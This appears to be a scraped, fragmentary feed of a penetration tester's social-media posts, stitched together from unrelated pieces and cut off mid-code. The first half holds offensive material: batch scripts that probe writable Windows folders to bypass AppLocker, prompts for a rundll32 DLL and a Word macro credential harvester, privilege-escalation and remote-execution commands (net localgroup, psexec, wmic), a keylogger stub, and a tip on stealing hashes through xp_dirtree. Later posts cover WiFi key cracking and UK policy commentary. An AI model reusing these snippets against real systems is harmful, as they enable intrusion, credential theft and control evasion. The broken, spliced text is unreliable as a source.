Find writeable folders in c:\windows to bypass AppLocker
@echo off
for /f "delims=" %%a in ('dir /b /ad "c:\windows"') do (
icacls "c:\windows\%%a" | find ":(W)"
if %errorlevel% equ 0 echo "c:\windows\%%a is writable"
)
Try and bypass AppLocker
@echo off
for /f "delims=" %%a in ('dir /b /ad "c:\windows"') do (
echo Testing directory: "c:\windows\%%a"
echo "This file is a test." > "c:\windows\%%a\testfile.txt"
if %errorlevel% equ 0 (
echo "c:\windows\%%a is writable"
del… twitter.com/i/web/status/1…
make me a DLL that runs calc.exe and show me how to execute it via rundll32.exe
make me a cred harvester document in WORD using macros!
Send an email asking for gift vouchers urgently... LOL
net localgroup administrators /add DOMAIN\Username
ok this one is a bit odd..
psexec -i -s cmd.exe
//this will RUN a LOCAL SYSTEM
wmic /node:<remote_computer_name> /user:<username> process call create "<command_to_run>"
namespace Keylogger
{
class Program
{
static void Main(string[] args)
{
// Create a file stream for the log file
StreamWriter logfile = new… twitter.com/i/web/status/1…
INSERT INTO MyTable (ID, Filename, Filedata)
SELECT ROW_NUMBER() OVER (ORDER BY sub.[file]) AS ID,
sub.[file] AS Filename,
BulkColumn AS Filedata
FROM OPENROWSET(BULK… twitter.com/i/web/status/1…
Steal hashes by using xp_dirtree to read a file from a server running responder/inveigh ;)
#######################
CREATE TABLE MyTable (
ID int PRIMARY KEY,
Filename varchar(255),
Filedata varchar(MAX)
);
Firstly the TP-Link to show how poor their defaults are (on most of their kit I find ITW)
You can crack the key space here in 4 minutes on a laptop with not mega GPU
One of the WiFi participants managed to capture the key material and then crack the hashes from the TP-link so they won some swag! (A shadow router and a tp link usb WiFi adaptor #ironic)
What didn’t work during the workshop was capturing a hash from the WPA2 PSK network on the UniFi gear…. And I don’t know why!
So time to investigate!
ok so to explain the UNIFI setup a bit:
we have a Unifi Express 7! This has an ethernet WAN port. So because we want to have this as a mobile lab, we combine it with a GL-iNet Router via ethernet then we can use that router to get an internet connection (either WIFI repeater, Ethernet, USB 4G Modem)
(we could use other kit but this works well)
so here we have the GL-AXT1800 in WIFI repeater mode! so now are UNIFI router has internet access!
so here we have the Unify Console dashboard!
Next step let's go check out the wireless networks!
What could happen when you ban or put barriers in front of things on the internet?
Surely nothing bad could happen, because you are restricting of banning the bad thing right! *inserts Anakin/Padme meme*
#OnlineSafetyAct #UK
So let's look at the scenario:
Controls have been placed in front of adult content sites (where the visitor is 'from the UK')
Introducing the Online Safety Act (a UK Law which applies to UK Citizens/UK Organisations) - sitting in a global internet! (that's important to recognise)
looks similar as almost every org I've worked with (super broad generalisation)
legacy systems oh my! wait till we see what runs in the private sector! (don't tell anyone about those 2008 servers!)
This might sound doom and gloom but having a view of maturity/resiliance across the government is a great thing! you can't address what you don't 'know' about!
This paragraph sounds in line with most orgs (IMHO)
I've been conducting maturity assessments for orgs of all shapes and sizes for a long long time! lots of people say they are a 3 when they are in fact a 1-2 (if we are using CMMi-SCV etc.)